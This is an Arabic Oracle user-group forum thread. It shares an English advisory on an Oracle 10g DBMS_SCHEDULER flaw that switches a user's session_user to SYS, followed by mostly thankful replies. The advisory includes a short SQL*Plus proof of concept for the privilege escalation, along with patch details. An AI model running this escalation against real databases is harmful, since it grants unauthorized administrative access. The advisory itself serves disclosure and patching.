الانتقال إلى المحتوى
View in the app

A better way to browse. Learn more.

مجموعة مستخدمي أوراكل العربية

A full-screen app on your home screen with push notifications, badges and more.

To install this app on iOS and iPadOS
  1. Tap the Share icon in Safari
  2. Scroll the menu and tap Add to Home Screen.
  3. Tap Add in the top-right corner.
To install this app on Android
  1. Tap the 3-dot menu (⋮) in the top-right corner of the browser.
  2. Tap Add to Home screen or Install app.
  3. Confirm by tapping Install.

ثغرة في اصدار اوراكل

Featured Replies

بتاريخ:

اثناء تجوالي(بتعرفو انا بسافر كثير :huh: ) في احد المواقع (الاجنبية طبعا لان المعلومة عن الاوراكل في المواقع العربية ستكون هنا اولا) لفت انتباهي موضوع عن وجود ثغرة تمت ترقيتها في 5/ 2005 واحنا ما معنا خبر :) :) :rolleyes:

المهم الثغر مش بسيطة فهي تقوم بتحويلالمستخدم العادي الى اليوزر sys :blink: :blink: نعم sys


وهذا مفاد المقال

DBMS_SCHEDULER SESSION_USER issue in Oracle 10g

Name	 DBMS_SCHEDULER SESSION_USER issue in Oracle 10g
Systems Affected	 Oracle 10g
Severity	 Medium Risk
Category	 Switch Oracle Username to user SYS
Vendor URL	 http://www.oracle.com/
Credit	 Oracle Metalink Forum 633336.995
Exploit	 Forum Entry removed by Oracle
Date	 07 May 2005 (V 1.02)
VU#	 176909

Details

The following proof of concept exploit code (from Metalink) allows any user with CREATE JOB privileges to switch the session_user to SYS. This statement is often used together with VPD (Virtual Private Database) or OLS (Oracle Label Security) and could allow privilege escalation. The old deprecated current_user shows the right user.

Example
Connect as a user with CREATE job privilege

SQL> select user from dual;

USER
---------
JOBUSER

SQL> execute dbms_scheduler.run_job('ANY_JOB');

PL/SQL procedure successfully completed.

SQL> select user from dual;

USER
---------
SYS

SQL> select (sys_context('userenv','session_user')) from dual;

USER
---------
SYS

SQL> select (sys_context('userenv','current_user')) from dual;

USER
---------
JOBUSER

SQL> show user

USER is "jobuser"



Patch Information
Apply the patches for Oracle Critical Patch Update October 2005.


History
05-may-2005 US CERT VU# added (V1.01)
07-may-2005 Oracle removed the forum entry from Metalink (V1.02)
18-oct-2005 Oracle released CPU October 2005


تحياتي

تم تعديل بواسطة moody_4u

بتاريخ:

معلومه رائعه جداً...
الصحيح...الكمال لله.... ويكثر خيرك يا مبدع

بتاريخ:

السلام عليكم
شكرا اخي
موضوعك زادني حبا للاوراكل
شكرا جزيلا

بتاريخ:
  • كاتب الموضوع

الجميل تدارك الخطأ وتنزيل الباتش فلم يستغرق ذلك سوى بضعة أيام

بتاريخ:

And there is some thing else
when i grant sysdba to a user
and when connect using that user as sysdba
when i check for the user show user
i get SYS not th euser i conneted with
is that normal.

بتاريخ:

شكرا مودى على معلوماتك القيمه ......وياريت متبخلش عننا باى معلومات

بتاريخ:

السلام عليكم
انا حاولت اجرب لكن ما قدرت
لو في واحد جرب يورينا

بتاريخ:
  • كاتب الموضوع

اخوي الموضوع واضح... هذا كان في اصدار 10g ما قبل التعديل 10.1.0.3

بتاريخ:

معلومة هامة جدا
نور الله دربك

  • بعد 2 شهور...
بتاريخ:

شكرا على المعلومه

  • بعد 5 أسابيع...
بتاريخ:

معلومة أكثر من رائعة

  • بعد 4 أسابيع...
بتاريخ:

معلومه رائعه جداً...
الصحيح...الكمال لله.... ويكثر خيرك يا مبدع
بتاريخ:

الجميل تدارك الخطأ وتنزيل الباتش فلم يستغرق ذلك سوى بضعة أيام


Yest that's normal
بتاريخ:

جزاك الله خير ونور بصيرتك :)

  • بعد 3 أسابيع...
بتاريخ:

T H A N K 'S

M O O O D y

  • بعد 3 أسابيع...
بتاريخ:

جميل جدا

بتاريخ:

جزاك الله الف خير
لكن المهم هل تم معالجتها في الإصدار الأخير أم لا؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟

بتاريخ:

السلام عليكم ورحمة الله وبركاته
شكرا أخي علي هذه المعلومة

بتاريخ:

يسلمووووووو أخي على المعلومة
بس انا ما بعرف ايش تقصد sys وبالاخص أني مبتدئة بالاوراكل

  • بعد 2 أسابيع...
بتاريخ:

الف شكر يا اخوي والله يزيد الكرماء من امثالك

انضم إلى المناقشة

يمكنك المشاركة الآن والتسجيل لاحقاً. إذا كان لديك حساب, سجل دخولك الآن لتقوم بالمشاركة من خلال حسابك.

زائر
أضف رد على هذا الموضوع...

برجاء الإنتباه

بإستخدامك للموقع فأنت تتعهد بالموافقة على هذه البنود: سياسة الخصوصية

Account

Navigation

البحث

إعداد إشعارات المتصفح الفورية

Chrome (Android)
  1. Tap the lock icon next to the address bar.
  2. Tap Permissions → Notifications.
  3. Adjust your preference.
Chrome (Desktop)
  1. Click the padlock icon in the address bar.
  2. Select Site settings.
  3. Find Notifications and adjust your preference.